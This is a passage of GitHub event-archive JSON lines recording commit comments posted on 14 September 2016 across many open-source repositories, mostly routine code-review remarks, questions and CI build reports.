1905-02-10-p5.pdf…]()\r\n[Uploading 1905-02-10-p6.pdf…]()\r\n[Uploading 1905-02-10-p7.pdf…]()\r\n[Uploading 1905-02-11-p1.pdf…]()\r\n[Uploading 1905-02-11-p2.pdf…]()\r\n[Uploading 1905-02-11-p3.pdf…]()\r\n[Uploading 1905-02-11-p4.pdf…]()\r\n[Uploading 1905-02-11-p5.pdf…]()\r\n[Uploading 1905-02-11-p6.pdf…]()\r\n[Uploading 1905-02-11-p7.pdf…]()\r\n[Uploading 1905-02-11-p8.pdf…]()\r\n[Uploading 1905-02-11-p9.pdf…]()\r\n"}},"created_at":"2016-09-14T15:28:01Z"}
{"id":"4562693246","type":"CommitCommentEvent","actor":{"login":"gloomylego"},"repo":{"name":"skapix/mmcs-sfedu_compiler"},"payload":{"comment":{"id":19021073,"position":10,"line":11,"path":"Nodes.cs","commit_id":"475af67ed59bf4bd22126d9f611588d87917bb77","created_at":"2016-09-14T15:28:07Z","updated_at":"2016-09-14T15:28:07Z","body":"почему int?\r\n"}},"created_at":"2016-09-14T15:28:07Z"}
{"id":"4562698228","type":"CommitCommentEvent","actor":{"login":"aq1018"},"repo":{"name":"aq1018/mongoid-history"},"payload":{"comment":{"id":19021084,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T15:28:52Z","updated_at":"2016-09-14T15:28:52Z","body":"hmmm... \r\n\r\n<img width=\"1329\" alt=\"screen shot 2016-09-14 at 8 26 32 am\" src=\"https://cloud.githubusercontent.com/assets/18140/18518535/41a9f8d2-7a55-11e6-9b4b-0a3f4896c346.png\">\r\n\r\n"}},"created_at":"2016-09-14T15:28:52Z"}
{"id":"4562700897","type":"CommitCommentEvent","actor":{"login":"jayvdb"},"repo":{"name":"coala-analyzer/coala-bears"},"payload":{"comment":{"id":19021094,"position":null,"line":null,"path":null,"commit_id":"172255e03290c3341b5f7c07280629402f43212a","created_at":"2016-09-14T15:29:18Z","updated_at":"2016-09-14T15:29:18Z","body":"Should be all lowercase."}},"created_at":"2016-09-14T15:29:18Z"}
{"id":"4562701721","type":"CommitCommentEvent","actor":{"login":"andybell"},"repo":{"name":"ucd-cws/arcproject-wq-processing"},"payload":{"comment":{"id":19021096,"position":7,"line":4,"path":"scripts/Folder_matches_summary.csv","commit_id":"80330913311f0882614e4888855c7fcb8f679b78","created_at":"2016-09-14T15:29:25Z","updated_at":"2016-09-14T15:29:25Z","body":"Why are these ERRORs now? it it failing when writing out to the shapefile?"}},"created_at":"2016-09-14T15:29:25Z"}
{"id":"4562706393","type":"CommitCommentEvent","actor":{"login":"magicismight"},"repo":{"name":"react-native-community/react-native-svg"},"payload":{"comment":{"id":19021104,"position":15,"line":14,"path":"Example/package.json","commit_id":"3d4974942a46daa36d0a436cb2010aa158c4995e","created_at":"2016-09-14T15:30:09Z","updated_at":"2016-09-14T15:30:09Z","body":"@brentvatne after got this merged.\r\nI can't get the exmaple project running independently.\r\nIs there some work around to get this example work on both exponent and by itself?"}},"created_at":"2016-09-14T15:30:09Z"}
{"id":"4562707518","type":"CommitCommentEvent","actor":{"login":"jhudsonWA"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19021107,"position":null,"line":null,"path":null,"commit_id":"81c8672414855e2de7265b792674d11940f8df23","created_at":"2016-09-14T15:30:21Z","updated_at":"2016-09-14T15:30:21Z","body":"I thought so but when someone checked in swift 3 support they set the swift version to 3.0 Did you test it with earlier versions of swift?"}},"created_at":"2016-09-14T15:30:21Z"}
{"id":"4562708712","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19021113,"position":9,"line":171,"path":"UM/Settings/SettingInstance.py","commit_id":"9fa133da046af2504fd3681d6dfbedb3a46da008","created_at":"2016-09-14T15:30:32Z","updated_at":"2016-09-14T15:30:32Z","body":"Yeah this was accidental. My bad. This has already been fixed. "}},"created_at":"2016-09-14T15:30:32Z"}
{"id":"4562714048","type":"CommitCommentEvent","actor":{"login":"AvivRubys"},"repo":{"name":"brigand/babel-plugin-flow-react-proptypes"},"payload":{"comment":{"id":19021126,"position":null,"line":null,"path":null,"commit_id":"8ba27db533645592ed565ab1cdad07ea7921c489","created_at":"2016-09-14T15:31:23Z","updated_at":"2016-09-14T15:31:23Z","body":"I was actually about to send a PR :)\r\nNo matter, I did exactly the same, thanks!"}},"created_at":"2016-09-14T15:31:23Z"}
{"id":"4562715428","type":"CommitCommentEvent","actor":{"login":"huitseeker"},"repo":{"name":"SkymindIO/spark"},"payload":{"comment":{"id":19021134,"position":null,"line":null,"path":null,"commit_id":"5374854fde881c382538084e9747067c2b834a36","created_at":"2016-09-14T15:31:35Z","updated_at":"2016-09-14T15:31:35Z","body":"Wait, spark's `cores.max`, in coarse-grained, is a global maximum. Here, we're trying to compute a per-executor value to set up the task. Reading the code, your `cpusToUse` is a min between \"whatever's *globally* left\" and the offer's # of CPUs. It seems to me very possible you receive a # of CPUs in the offer that would be > the # of GPUs (presumably 1)."}},"created_at":"2016-09-14T15:31:35Z"}
{"id":"4562715806","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19021135,"position":null,"line":null,"path":null,"commit_id":"8e01ccfb8236db32c4b86c1adfdbb2ae45db2e48","created_at":"2016-09-14T15:31:38Z","updated_at":"2016-09-14T15:31:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1003](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13283&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:07"}},"created_at":"2016-09-14T15:31:38Z"}
{"id":"4562718984","type":"CommitCommentEvent","actor":{"login":"adrianestrada"},"repo":{"name":"adrianestrada/SASAAS"},"payload":{"comment":{"id":19021145,"position":null,"line":null,"path":null,"commit_id":"a82c4261bbce8206968fde8511eeb1974951213a","created_at":"2016-09-14T15:32:10Z","updated_at":"2016-09-14T15:32:10Z","body":"Carpeta para Solaris"}},"created_at":"2016-09-14T15:32:10Z"}
{"id":"4562721195","type":"CommitCommentEvent","actor":{"login":"max-mud"},"repo":{"name":"max-mud/DPL_AMModeller"},"payload":{"comment":{"id":19021153,"position":null,"line":null,"path":null,"commit_id":"3dcbf221ea7edc48156d3cf43a3709216566fe8a","created_at":"2016-09-14T15:32:30Z","updated_at":"2016-09-14T15:32:30Z","body":"First init"}},"created_at":"2016-09-14T15:32:30Z"}
{"id":"4562724083","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19021159,"position":9,"line":235,"path":"plugins/CuraEngineBackend/CuraEngineBackend.py","commit_id":"76e57c940d9b8535ea71696f4ceddaf07f13296f","created_at":"2016-09-14T15:32:56Z","updated_at":"2016-09-14T15:32:56Z","body":"There is a difference between \"We don't have any data regarding this combination\" (which should allow the user to experiment and \"If you do this your machine will break\". Explicitly labeling a combination as not supported **must** result in an error. "}},"created_at":"2016-09-14T15:32:56Z"}
{"id":"4562724928","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19021163,"position":7,"line":233,"path":"plugins/CuraEngineBackend/CuraEngineBackend.py","commit_id":"76e57c940d9b8535ea71696f4ceddaf07f13296f","created_at":"2016-09-14T15:33:04Z","updated_at":"2016-09-14T15:33:04Z","body":":$ Whoops. "}},"created_at":"2016-09-14T15:33:04Z"}
{"id":"4562726320","type":"CommitCommentEvent","actor":{"login":"Piruzzolo"},"repo":{"name":"sn6uv/Mathics"},"payload":{"comment":{"id":19021166,"position":26,"line":152,"path":"mathics/builtin/plot.py","commit_id":"6c961794c723c513f157b718cd6a7000b7856292","created_at":"2016-09-14T15:33:18Z","updated_at":"2016-09-14T15:33:18Z","body":"llvmlite has a specific type [llvmlite.ir.ArrayType](https://llvmlite.readthedocs.io/en/latest/ir/types.html#aggregate-types) for arrays. Maybe this would lead to better performance. Also see [this](https://github.com/mathics/Mathics/pull/548#issuecomment-247046155)"}},"created_at":"2016-09-14T15:33:18Z"}
{"id":"4562727215","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19021168,"position":null,"line":null,"path":null,"commit_id":"acd8aac3f65c5e5c1b3c50615fb713841440a693","created_at":"2016-09-14T15:33:26Z","updated_at":"2016-09-14T15:33:26Z","body":"Squash with `Switch to using storagebackend.Factory consistently`"}},"created_at":"2016-09-14T15:33:26Z"}
{"id":"4562728166","type":"CommitCommentEvent","actor":{"login":"acer1528"},"repo":{"name":"deltaxflux/fluxion"},"payload":{"comment":{"id":19021170,"position":null,"line":null,"path":null,"commit_id":"c2be5ee00d505c3bcef39ba36ab7441114da2faf","created_at":"2016-09-14T15:33:35Z","updated_at":"2016-09-14T15:33:35Z","body":"Hi...how to make login pages for other wifi routers like tenda,TP.link...etc....pls help...thank u....\r\n"}},"created_at":"2016-09-14T15:33:35Z"}
{"id":"4562735368","type":"CommitCommentEvent","actor":{"login":"forestkeeper"},"repo":{"name":"dogeyes/LIP"},"payload":{"comment":{"id":19021183,"position":null,"line":null,"path":null,"commit_id":"cdae1522d22f6f4205a1af1410874a45c07b816a","created_at":"2016-09-14T15:34:41Z","updated_at":"2016-09-14T15:34:41Z","body":"impressive"}},"created_at":"2016-09-14T15:34:41Z"}
{"id":"4562736210","type":"CommitCommentEvent","actor":{"login":"stepshal"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19021187,"position":null,"line":null,"path":null,"commit_id":"a6ccc3e518eabf61cc41575e52361d5ea79e3796","created_at":"2016-09-14T15:34:46Z","updated_at":"2016-09-14T15:34:46Z","body":"I found exctractors where i can do same change, should i do it in https://github.com/rg3/youtube-dl/pull/10597?"}},"created_at":"2016-09-14T15:34:46Z"}
{"id":"4562738004","type":"CommitCommentEvent","actor":{"login":"flug"},"repo":{"name":"greg0ire/enum"},"payload":{"comment":{"id":19021194,"position":null,"line":null,"path":null,"commit_id":"1b3ecfc2e53a323eb8a28e09b7267e4c813e0ba2","created_at":"2016-09-14T15:35:07Z","updated_at":"2016-09-14T15:35:07Z","body":"Mokay 👍 "}},"created_at":"2016-09-14T15:35:07Z"}
{"id":"4562738193","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19021195,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T15:35:09Z","updated_at":"2016-09-14T15:35:09Z","body":"So basically barbs got fixed probably in the last release."}},"created_at":"2016-09-14T15:35:09Z"}
{"id":"4562739715","type":"CommitCommentEvent","actor":{"login":"smarterclayton"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19021202,"position":null,"line":null,"path":null,"commit_id":"acd8aac3f65c5e5c1b3c50615fb713841440a693","created_at":"2016-09-14T15:35:22Z","updated_at":"2016-09-14T15:35:22Z","body":"Really?  They're pretty different"}},"created_at":"2016-09-14T15:35:22Z"}
{"id":"4562753027","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19021234,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T15:37:22Z","updated_at":"2016-09-14T15:37:22Z","body":"sorry I meant: ..as soon the Bishop moves into..."}},"created_at":"2016-09-14T15:37:22Z"}
{"id":"4562753453","type":"CommitCommentEvent","actor":{"login":"ssalinas"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19021235,"position":null,"line":null,"path":null,"commit_id":"fde57ccbc85161a3ef3772e37e7b0785fcf5e761","created_at":"2016-09-14T15:37:26Z","updated_at":"2016-09-14T15:37:26Z","body":"🚢 "}},"created_at":"2016-09-14T15:37:26Z"}
{"id":"4562754001","type":"CommitCommentEvent","actor":{"login":"ssalinas"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19021237,"position":null,"line":null,"path":null,"commit_id":"0c63d89bc17cd77b1c6a5610d7d9eb661a0a6772","created_at":"2016-09-14T15:37:31Z","updated_at":"2016-09-14T15:37:31Z","body":"🚢 "}},"created_at":"2016-09-14T15:37:31Z"}
{"id":"4562755725","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19021242,"position":17,"line":1388,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:37:46Z","updated_at":"2016-09-14T15:37:46Z","body":"In GuardianAI i added ReactState, i think this is not correct, we should implement a general unit reactstate. And that general unit react state will fit correcly to UNIT_STAT_REACT_AGGRESSIVE if not set that would meant DEFENSIVE reaction and add another UNIT_STAT_REACT_PASSIVE that will overwrite that aggressive flag.\r\nWell iam just wrinting what i have in mind while i have it :) I may be wrong.\r\nAnyway its not subject of the current code so you can use it directly for now. "}},"created_at":"2016-09-14T15:37:46Z"}
{"id":"4562755827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19021244,"position":null,"line":null,"path":null,"commit_id":"4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf","created_at":"2016-09-14T15:37:47Z","updated_at":"2016-09-14T15:37:47Z","body":"versionNumbers (mitchute) - x86_64-MacOS-10.9-clang: OK (2328 of 2328 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4e047aa2b40e4ace2212e1e6e15c8f24beecf3bf-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T15:37:47Z"}
{"id":"4562756061","type":"CommitCommentEvent","actor":{"login":"magicismight"},"repo":{"name":"react-native-community/react-native-svg"},"payload":{"comment":{"id":19021245,"position":15,"line":14,"path":"Example/package.json","commit_id":"3d4974942a46daa36d0a436cb2010aa158c4995e","created_at":"2016-09-14T15:37:49Z","updated_at":"2016-09-14T15:37:49Z","body":"Or just move the example into other independent packages? like:\r\nreact-native-svg-example and react-native-exponent-example"}},"created_at":"2016-09-14T15:37:49Z"}
{"id":"4562757022","type":"CommitCommentEvent","actor":{"login":"Niansheng"},"repo":{"name":"pytest-dev/pytest"},"payload":{"comment":{"id":19021246,"position":null,"line":null,"path":null,"commit_id":"4eeb4751385519d54b304176f4712ec4ae01865b","created_at":"2016-09-14T15:37:58Z","updated_at":"2016-09-14T15:37:58Z","body":"Hi mbyt\r\n\r\nRecently we have problem to run \"**pytest --pdb**\" with our flask testcases. The testcases were fine until this change. The case is when we add **--pdb** option all the case failed with the same reason. \"self.app is None\", but if no \"**--pdb**\" then all tests pass.\r\n\r\nBy debugging, we found that this _pre_setup function \r\nhttps://github.com/jarus/flask-testing/blob/master/flask_testing/utils.py#L102 is called to setup **_self.app_**.\r\nBut since the change, it calls the debug function instead of the Testcase which will skip the whole pre_setup function. \r\n\r\nI tried to customise our own debug function to call **pre_setup**, but failed with further issues(request mocker). So I am wondering if I am doing right, or this is an issue I can address with flask_testing. \r\n\r\nFor now we just use previous version of pytest, but we like to be as close as possible to the latest. Any advise will be appreciated. Thanks \r\n\r\nVictor Liu\r\n"}},"created_at":"2016-09-14T15:37:58Z"}
{"id":"4562757067","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"antauth/pr-test"},"payload":{"comment":{"id":19021247,"position":5,"line":5,"path":"README.md","commit_id":"6f3852c9fd12abc7b83984509a61be3e3bb215cf","created_at":"2016-09-14T15:37:59Z","updated_at":"2016-09-14T15:37:59Z","body":"Can I do this?"}},"created_at":"2016-09-14T15:37:59Z"}
{"id":"4562762334","type":"CommitCommentEvent","actor":{"login":"nickthetait"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19021259,"position":6,"line":123,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"5c5d1888894d541eb8ff8c092daf5bf1170ff7fd","created_at":"2016-09-14T15:38:48Z","updated_at":"2016-09-14T15:38:48Z","body":"Why was this setting tossed out?"}},"created_at":"2016-09-14T15:38:48Z"}
{"id":"4562770383","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":19021272,"position":7,"line":23,"path":"app/assets/stylesheets/application.css.scss","commit_id":"2be829b9163897e8bb57ceea9709a5d5e61faee1","created_at":"2016-09-14T15:40:03Z","updated_at":"2016-09-14T15:40:03Z","body":"I used the existing CSS here, rewriting that was not my main goal so I avoided that jak :)\r\n\r\nNormally I try to do BEM for everything new."}},"created_at":"2016-09-14T15:40:03Z"}
{"id":"4562770726","type":"CommitCommentEvent","actor":{"login":"BasThomas"},"repo":{"name":"SwiftWeekly/swiftweekly.github.io"},"payload":{"comment":{"id":19021273,"position":null,"line":null,"path":null,"commit_id":"300780cc5e569c28f5fd4d950cf87eeee612b95e","created_at":"2016-09-14T15:40:08Z","updated_at":"2016-09-14T15:40:08Z","body":"Thanks for the cleanup 😁 "}},"created_at":"2016-09-14T15:40:08Z"}
{"id":"4562771193","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19021274,"position":null,"line":null,"path":null,"commit_id":"a6ccc3e518eabf61cc41575e52361d5ea79e3796","created_at":"2016-09-14T15:40:12Z","updated_at":"2016-09-14T15:40:12Z","body":"Go for it but include in different PR."}},"created_at":"2016-09-14T15:40:12Z"}
{"id":"4562771151","type":"CommitCommentEvent","actor":{"login":"coldmind"},"repo":{"name":"MagicStack/asyncpg"},"payload":{"comment":{"id":19021276,"position":null,"line":null,"path":null,"commit_id":"cd0003a35089d8747c77080e1a903bfc07609a97","created_at":"2016-09-14T15:40:13Z","updated_at":"2016-09-14T15:40:13Z","body":"@1st1, please release the 0.5.4 version, documentation is confusing about this feature (0.5.4 it is not released, but there is a description how to pass query arguments)"}},"created_at":"2016-09-14T15:40:13Z"}
{"id":"4562774591","type":"CommitCommentEvent","actor":{"login":"pdelcoco"},"repo":{"name":"flaviovdf/pyksc"},"payload":{"comment":{"id":19021284,"position":null,"line":null,"path":null,"commit_id":"979f1310d8333d08ab3ad893856c37700f5db076","created_at":"2016-09-14T15:40:44Z","updated_at":"2016-09-14T15:40:44Z","body":"Hi, \r\nI find your code really useful. However I'm getting some unexpected results with the betacv metric. I would like to ask whether the line 59 should be instead: return (intra_std / intra_mean) / (inter_std / inter_mean).\r\nThanks."}},"created_at":"2016-09-14T15:40:44Z"}
{"id":"4562776405","type":"CommitCommentEvent","actor":{"login":"wesllenalves"},"repo":{"name":"wesllenalves/curso-php"},"payload":{"comment":{"id":19021290,"position":null,"line":null,"path":null,"commit_id":"d30e2662fd1bd51a4d386766f12a4771a88c4300","created_at":"2016-09-14T15:41:02Z","updated_at":"2016-09-14T15:41:02Z","body":"Tive que inserir as modificações todas de uma vez, visto que fiz em uma 4 pasta como aula4 mais na ora de fazer o commit para cá dava erro então copiei tudo para pasta aula3 e fiz o commit."}},"created_at":"2016-09-14T15:41:02Z"}
{"id":"4562779508","type":"CommitCommentEvent","actor":{"login":"mingard"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":19021301,"position":null,"line":null,"path":null,"commit_id":"51cb5c23b0ab56c00440bc1d51c8b4ebdf8d0dca","created_at":"2016-09-14T15:41:31Z","updated_at":"2016-09-14T15:41:31Z","body":"Thanks @joallard - If it helps, I'm happy to pitch in "}},"created_at":"2016-09-14T15:41:31Z"}
{"id":"4562780019","type":"CommitCommentEvent","actor":{"login":"damiansb"},"repo":{"name":"damiansb/dbo"},"payload":{"comment":{"id":19021302,"position":null,"line":null,"path":null,"commit_id":"9c95f81baebf735e9963842b621e67e371f3bf26","created_at":"2016-09-14T15:41:37Z","updated_at":"2016-09-14T15:41:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;jdcLmY7z&#x2F;63-alteracoes-do-dbo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Alterações do DBO</a>"}},"created_at":"2016-09-14T15:41:37Z"}
{"id":"4562781295","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19021304,"position":null,"line":null,"path":null,"commit_id":"8e0bb60f371489e6792d0cc5a2949cf825a8eb05","created_at":"2016-09-14T15:41:49Z","updated_at":"2016-09-14T15:41:49Z","body":"> never recalculate \r\nBut rooms/structures/roads will change... How to handle that?"}},"created_at":"2016-09-14T15:41:49Z"}
{"id":"4562783689","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19021310,"position":null,"line":null,"path":null,"commit_id":"5b0a20aba67c76fe8c3d5fbe695c06bbe99d2652","created_at":"2016-09-14T15:42:14Z","updated_at":"2016-09-14T15:42:14Z","body":"🚢 "}},"created_at":"2016-09-14T15:42:14Z"}
{"id":"4562784121","type":"CommitCommentEvent","actor":{"login":"dbarbar"},"repo":{"name":"industrydive/dive_sailthru_client"},"payload":{"comment":{"id":19021312,"position":39,"line":39,"path":"dive_sailthru_client/client.py","commit_id":"d13c20a59bdc291fd6bd3d689b8f8ddfd9942f5e","created_at":"2016-09-14T15:42:19Z","updated_at":"2016-09-14T15:42:19Z","body":"Oh right. Good catch."}},"created_at":"2016-09-14T15:42:19Z"}
{"id":"4562784186","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"saucelabs-sample-scripts/JavaScript"},"payload":{"comment":{"id":19021314,"position":11,"line":11,"path":"reporting_custom_framework.js","commit_id":"5e225be7b815f311e9bf91aaf63778248eefb276","created_at":"2016-09-14T15:42:20Z","updated_at":"2016-09-14T15:42:20Z","body":"The documentation says it's an integer but not if it's in milliseconds or seconds. Care to clarify?"}},"created_at":"2016-09-14T15:42:20Z"}
{"id":"4562786973","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/gridlook"},"payload":{"comment":{"id":19021322,"position":null,"line":null,"path":null,"commit_id":"90f42981f00a6fbfb3419b7db4d99acd947c1523","created_at":"2016-09-14T15:42:44Z","updated_at":"2016-09-14T15:42:44Z","body":"It’s documented since before this."}},"created_at":"2016-09-14T15:42:44Z"}
{"id":"4562787354","type":"CommitCommentEvent","actor":{"login":"stepshal"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19021323,"position":null,"line":null,"path":null,"commit_id":"a6ccc3e518eabf61cc41575e52361d5ea79e3796","created_at":"2016-09-14T15:42:47Z","updated_at":"2016-09-14T15:42:47Z","body":"@dstftw what about https://github.com/rg3/youtube-dl/pull/10597, should i split it too so it can be merged sooner?"}},"created_at":"2016-09-14T15:42:47Z"}
{"id":"4562797770","type":"CommitCommentEvent","actor":{"login":"KevinStock"},"repo":{"name":"LaunchCodeEducation/blogz"},"payload":{"comment":{"id":19021343,"position":null,"line":null,"path":null,"commit_id":"6b36ae40ec70b99288934ddd2228d7ec2fccc300","created_at":"2016-09-14T15:44:26Z","updated_at":"2016-09-14T15:44:26Z","body":"I was about to submit a pull request with this exact change! Works appropriately now. Thanks!"}},"created_at":"2016-09-14T15:44:26Z"}
{"id":"4562801801","type":"CommitCommentEvent","actor":{"login":"salimnanji"},"repo":{"name":"joaomgcd/JoinChrome"},"payload":{"comment":{"id":19021360,"position":null,"line":null,"path":null,"commit_id":"e546fd607084bfdc1bc9000dcd84a5df0a2402c0","created_at":"2016-09-14T15:45:03Z","updated_at":"2016-09-14T15:45:03Z","body":"Minor point to fix. The EventGhost icon looks either a little larger than the others, or is not lined up correctly. \r\n\r\n![image](https://cloud.githubusercontent.com/assets/12036621/18519112/a9a7815a-7a70-11e6-9ab6-dce95e31348e.png)\r\n"}},"created_at":"2016-09-14T15:45:03Z"}
{"id":"4562804237","type":"CommitCommentEvent","actor":{"login":"JrtPec"},"repo":{"name":"Azure/azure-storage-python"},"payload":{"comment":{"id":19021370,"position":73,"line":99,"path":"azure/storage/queue/models.py","commit_id":"f98b9c4d0a438161eea5faeea0a5b69abac793dc","created_at":"2016-09-14T15:45:25Z","updated_at":"2016-09-14T15:45:25Z","body":"'str' should be 'bytes' (in Python3 at least)\r\n\r\nIf you want this function to accept a (unicode) string, you have to add `data.encode('ascii')`"}},"created_at":"2016-09-14T15:45:25Z"}
{"id":"4562806704","type":"CommitCommentEvent","actor":{"login":"jbenfieldqa"},"repo":{"name":"jbenfieldqa/BattleShipsJB"},"payload":{"comment":{"id":19021378,"position":null,"line":null,"path":null,"commit_id":"9666c1626ffd310d7786024e5c184096e32bc918","created_at":"2016-09-14T15:45:48Z","updated_at":"2016-09-14T15:45:48Z","body":"battle ship files"}},"created_at":"2016-09-14T15:45:48Z"}
{"id":"4562807206","type":"CommitCommentEvent","actor":{"login":"ircwaves"},"repo":{"name":"Applied-GeoSolutions/gips"},"payload":{"comment":{"id":19021380,"position":17,"line":19,"path":"gips/inventory/dbinv/models.py","commit_id":"f3eaf3cd798232e4be80356bde9cbc8727964f69","created_at":"2016-09-14T15:45:52Z","updated_at":"2016-09-14T15:45:52Z","body":"`path` might be more clear, although `uri` might be more general and allow for non-`file://` assets in the future."}},"created_at":"2016-09-14T15:45:52Z"}
{"id":"4562812404","type":"CommitCommentEvent","actor":{"login":"RonnyPfannschmidt"},"repo":{"name":"pytest-dev/pytest"},"payload":{"comment":{"id":19021392,"position":null,"line":null,"path":null,"commit_id":"4eeb4751385519d54b304176f4712ec4ae01865b","created_at":"2016-09-14T15:46:42Z","updated_at":"2016-09-14T15:46:42Z","body":"@Niansheng please report a regular issue, we will then decide if we can figure a fix quickly or if we need to undo this until it is correctly working"}},"created_at":"2016-09-14T15:46:42Z"}
{"id":"4562819894","type":"CommitCommentEvent","actor":{"login":"erikrose"},"repo":{"name":"JaredKerim-Mozilla/fathom"},"payload":{"comment":{"id":19021404,"position":5,"line":223,"path":"utils.js","commit_id":"00d11be9d6cdac696a297bf2690254fa7002fd70","created_at":"2016-09-14T15:47:50Z","updated_at":"2016-09-14T15:47:50Z","body":"I'm puzzled. How could aAncestor ever be null if elementA and elementB are in the same DOM tree? As soon as aAncestor has ascended above or equal to elementB, it should stop. And obviously, the root element should contain() both elementA and elementB. The root is the only element that should have a null parentNode, and the loop should stop before trying to traverse above that. So what is going on?"}},"created_at":"2016-09-14T15:47:50Z"}
{"id":"4562820271","type":"CommitCommentEvent","actor":{"login":"Niansheng"},"repo":{"name":"pytest-dev/pytest"},"payload":{"comment":{"id":19021406,"position":null,"line":null,"path":null,"commit_id":"4eeb4751385519d54b304176f4712ec4ae01865b","created_at":"2016-09-14T15:47:53Z","updated_at":"2016-09-14T15:47:53Z","body":"will do thanks Ronny"}},"created_at":"2016-09-14T15:47:53Z"}
{"id":"4562821444","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19021412,"position":105,"line":53,"path":"helpers/app.js","commit_id":"2b3f2194315eeff6806a25a4ca28815c433d8205","created_at":"2016-09-14T15:48:04Z","updated_at":"2016-09-14T15:48:04Z","body":"Ça veut dire que si on a moins d'images que de fichiers JSON dans le répertoire `applications`, la callback n'est jamais appelée?!?\r\n\r\nSi jamais une image a été supprimée à la main..."}},"created_at":"2016-09-14T15:48:04Z"}
{"id":"4562822456","type":"CommitCommentEvent","actor":{"login":"Zamorak2"},"repo":{"name":"trackpete/exiletools-price-macro"},"payload":{"comment":{"id":19021414,"position":17,"line":50,"path":"README.md","commit_id":"ac1ae7c253844440a0188a92c5a8f7677ba73a74","created_at":"2016-09-14T15:48:15Z","updated_at":"2016-09-14T15:48:15Z","body":"404 not found"}},"created_at":"2016-09-14T15:48:15Z"}
{"id":"4562827373","type":"CommitCommentEvent","actor":{"login":"rivasd"},"repo":{"name":"rivasd/djPsych"},"payload":{"comment":{"id":19021427,"position":41,"line":118,"path":"djexperiments/views.py","commit_id":"dae2a4009d400b520e86d9d8f5c0482fb3290488","created_at":"2016-09-14T15:48:58Z","updated_at":"2016-09-14T15:48:58Z","body":"The OS cannot move a file that has not been written to disk yet!"}},"created_at":"2016-09-14T15:48:58Z"}
{"id":"4562829487","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19021434,"position":null,"line":null,"path":null,"commit_id":"fd13c3e8c16b5e2ef912dd87a8ff8760a1041d99","created_at":"2016-09-14T15:49:21Z","updated_at":"2016-09-14T15:49:21Z","body":"Going to ask for you to invert that. If ! constant."}},"created_at":"2016-09-14T15:49:21Z"}
